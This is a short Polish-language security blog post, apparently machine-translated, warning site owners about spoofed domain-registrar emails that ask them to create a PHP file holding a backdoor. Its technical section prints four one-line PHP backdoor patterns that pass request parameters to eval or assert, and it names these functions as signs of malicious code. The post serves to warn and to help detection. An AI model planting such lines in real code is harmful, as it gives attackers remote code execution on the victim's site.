Nie ufaj te e-maile z potwierdzeniem fałszywy domen

English version: Do not trust those fake domain confirmation emails

Ostatnio niektórzy z moich klientów otrzymali dziwne listy e-mail od swoich rejestratorów domen. Te litery zawierają prośbę o potwierdzenie domen. Sprawdziłem jeden z tych listów i szybko zidentyfikowałem go jako fałszywy list . Wszystkie litery mają identyczny wzór i prośbę o utworzenie pliku PHP w folderze głównym na stronie internetowej o określonej nazwie i podanej treści. Nie trzeba dodawać, że sugerowana zawartość tego pliku PHP zawiera złośliwy kod znany jako kod backdoor. Ten rodzaj kodu pozwala atakującemu na wykonanie dowolnej akcji na stronie ofiary.

Jeśli kiedykolwiek otrzymasz list, który wymaga utworzenia, pobrania lub zainstalowania kodu PHP na swojej stronie, musisz go zignorować. Bez wyjątków. Nawet jeśli list pochodzi od prezydenta lub twojej mamy.

Fałszywe litery wydają się uzasadnione z powodu legalnego adresu e-mail . Ale jest to fałszowanie wiadomości e-mail. Nie spodziewasz się, że otrzymasz fałszywą wiadomość e-mail od znajomych lub rejestratora domen. Dobrze? Nie! Każdy list e-mail może zawierać dowolny adres e-mail Z. Zdecydowana większość serwerów pocztowych i klientów poczty e-mail nie sprawdza ani nie weryfikuje adresu nadawcy. Widzisz to, jak chciał haker. Nie możesz ufać żadnemu listowi e-mail otrzymanemu od znanego nadawcy, jeśli list zawiera prośbę o podejrzane działania, takie jak zainstalowanie kodu na swojej stronie lub aplikacji na komputerze.

Szczegóły techniczne

Fałszywe wiadomości e-mail zazwyczaj zawierają niektóre z następujących linii PHP.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

FYI: base64_decode, eval i assert to dobrze znane znaczniki podejrzanego lub złośliwego kodu PHP.

Zobacz też: Inspektor wtyczek ujawnia problemy bezpieczeństwa z innymi wtyczkami